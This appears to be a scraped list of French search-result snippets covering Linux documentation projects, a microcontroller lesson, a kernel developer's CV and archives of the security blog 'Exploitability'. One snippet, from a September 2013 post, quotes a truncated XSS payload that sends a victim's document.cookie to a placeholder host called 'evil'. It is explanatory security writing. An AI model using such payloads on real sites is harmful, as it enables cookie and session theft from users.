wiki.traduc.org
Documents_techniques - Projet de traduction Traduc.org
http://wiki.traduc.org/Documents_techniques
Projet de documentation Linux. Le fameux GNU/Linux Magazine. Édite plusieurs journaux (GNU/Linux Magazine et Linux Pratique) dont il propose les articles en ligne. Était écrit en allemand par Georg C. Greeve qui le traduisait en anglais dans la foulée. Le but de ce projet est de traduire en français les articles de la Gazette Linux américaine dans les domaines les plus divers afin de mettre les logiciels libres à la portée du plus grand nombre de lecteurs. Projet de documentation Linux.
lemoidului.wordpress.com
Leçon au plus près du bit : streamer audio sur ATtiny 15L | Lemoidului
https://lemoidului.wordpress.com/2013/10/03/lecon-au-plus-pres-du-bit-streamer-audio-sur-attiny-15l
GNU/Linux, Electronique and Hacks. Leçon au plus près du bit : streamer audio sur ATtiny 15L. Leçon au plus près du bit : streamer audio sur ATtiny 15L. Octobre 3, 2013. Mais si, on en voit tout les jours sur hackaday. Des platines toutes faites avec un microcontrôleur AVR et quelques périphériques prêts à l’emploi. Arduino, une(des) plateforme(s) peu onéreuse(s), rassemble une communauté qui partage code et connaissances. Où est l’aspect éducatif et surtout didactique de la démarche? Pire, il y a des ca...
popies.net
Curriculum Vitae Stelian Pop
http://www.popies.net/resume/resume-fr.html
Téléchargez au format PDF:. Tél: 06 61 64 76 21. Expert Linux - Chef de projet - Team Leader. Informatique industrielle, temps réel, embarqué. Développeur du noyau Linux depuis 1998. Participation à de nombreux projets Open Source. Système Linux et ses variantes temps réel et embarquées. Logiciel de base (noyau, développement de pilotes, micro-controlleurs). Chef de projet et contributeur au projet de développement d'une chaîne de cross-compilation complète (binutils, gcc, gdb, eclipse) pour un micro-con...
boutique.ed-diamond.com
GNU/Linux Magazine - LES EDITIONS DIAMOND
https://boutique.ed-diamond.com/7-gnulinux-magazine
10 Place de la Cathédrale, 68000 Colmar, France Tél : 33 (0)3 67 10 00 20 Fax : 33 (0)3 67 10 00 21 Nous écrire. Vous visitez actuellement l'espace réservé aux particuliers. Vous êtes un professionnel? Produit ajouté au panier avec succès. Produits dans votre panier. Il y a 1 produit dans votre panier. Le magazine de référence technique pour les developpeurs et administrateurs sur systèmes open source. Voir les avis des lecteurs. Recevez un PDF gratuit! Du plus ancien au plus récent. De A à Z. Reconnaiss...
exploitability.blogspot.com
Exploitability: septembre 2013
http://exploitability.blogspot.com/2013_09_01_archive.html
Jeudi 26 septembre 2013. XSS, onmouseover et un peu de javascript. Je donne un petit trick que j'aime beaucoup avec du javascript pour faire du XSS. Soit une page web avec un input type qui permet d'effectuer une recherche. Cet input est réaffiché sur la page de résultat. Cet input type est de la forme:. Input id="search id" type="text" value="valeur". Et ma requête devient plus intéressante, (je coupe en plusieurs lignes pour la lisibilité:. Http:/ evil/cookie='.concat(escape(document.cookie) ". Et java...
exploitability.blogspot.com
Exploitability: février 2013
http://exploitability.blogspot.com/2013_02_01_archive.html
Jeudi 28 février 2013. Des cookies bien chauds (et bien nombreux). J'ai remarqué depuis quelques temps plusieurs sites webs (US généralement) qui demandent lors de la première connexion à choisir la politique de confidentialité des cookies. Et en choisissant les paramétrages au plus bas d'un site web (le nom n'a pas d'intérêt pour la démonstration), ça a été le feu d'artifice:. On constate que je choisis bien uniquement les cookies obligatoires). 546 requêtes HTTP (! Vendredi 15 février 2013. J'ai lu réc...
exploitability.blogspot.com
Exploitability: mai 2013
http://exploitability.blogspot.com/2013_05_01_archive.html
Jeudi 30 mai 2013. La cible et les 4 cavaliers de l'AP(T)ocalypse - Partie 2/4. Du hack à l'APT - Partie 1/4. Introduction : les menaces aveugles et massives du passé. Ces menaces ont évoluées et sont devenues plus dangereuses. La cible et les 4 cavaliers de l'AP(T)ocalypse - Partie 2/4. 1/ Une cible visée. Ou bien une installation en prévision d'une attaque de sabotage ( Aramco a vu ainsi 30000 de ses postes windows wipés simultanément. 2/ La stratégie d'attaque: Les 4 cavaliers de l'AP(T)ocalypse.
exploitability.blogspot.com
Exploitability: avril 2013
http://exploitability.blogspot.com/2013_04_01_archive.html
Mardi 30 avril 2013. Conférences, Livre Blanc, et autre info. Quelques petites infos disparates réunies dans le même post de Blog:. J'ai le plaisir d'aller assister au Training Corelan D'HackInParis. Les 17-18-19 juin prochain. Par ailleurs, je retourne aux RMLL2013 en tant que speaker pour parler du chiffrement de disque sous linux dans une conférence intitulée "Myths and reality". 2/Le livre blanc et la fameuse menace "cyber". Le livre blanc de la défense et sécurité nationale. Un goût de stuxnet?
exploitability.blogspot.com
Exploitability: août 2013
http://exploitability.blogspot.com/2013_08_01_archive.html
Mercredi 28 août 2013. Hard: la dernière frontière. Wikipedia indique qu'un ordinateur. Est une machine électronique qui fonctionne par la lecture séquentielle d'un ensemble d'instructions qui lui font exécuter des opérations logiques et arithmétiques sur des chiffres binaires. Imaginez une carte réseau qui ne remonte que certains paquets, mais pas tous au système? Ou bien un disque dur qui cache des données à un filesystem, ou une carte mère qui hooke avant le boot des fonctions? Qui indique "hardware b...
exploitability.blogspot.com
Exploitability: SSTIC 2014
http://exploitability.blogspot.com/2014/06/sstic-2014.html
Mardi 3 juin 2014. Tout droit sorti de l'imprimante. Inscription à : Publier les commentaires (Atom). A propos de l'auteur. Utilisation d'une puce TPM sous linux. Pour m'écrire: kevin2nis chez gmail point com. Ceci est un blog personnel, ce qui est exposé ici est donc le reflet des mes réflexions et positions personnelles et n'engagent donc que moi". Afficher mon profil complet. 2014 : Haka, un langage orienté réseaux et sécurité. 2013: Le chiffrement de disque sous linux, deuxième round.
SOCIAL ENGAGEMENT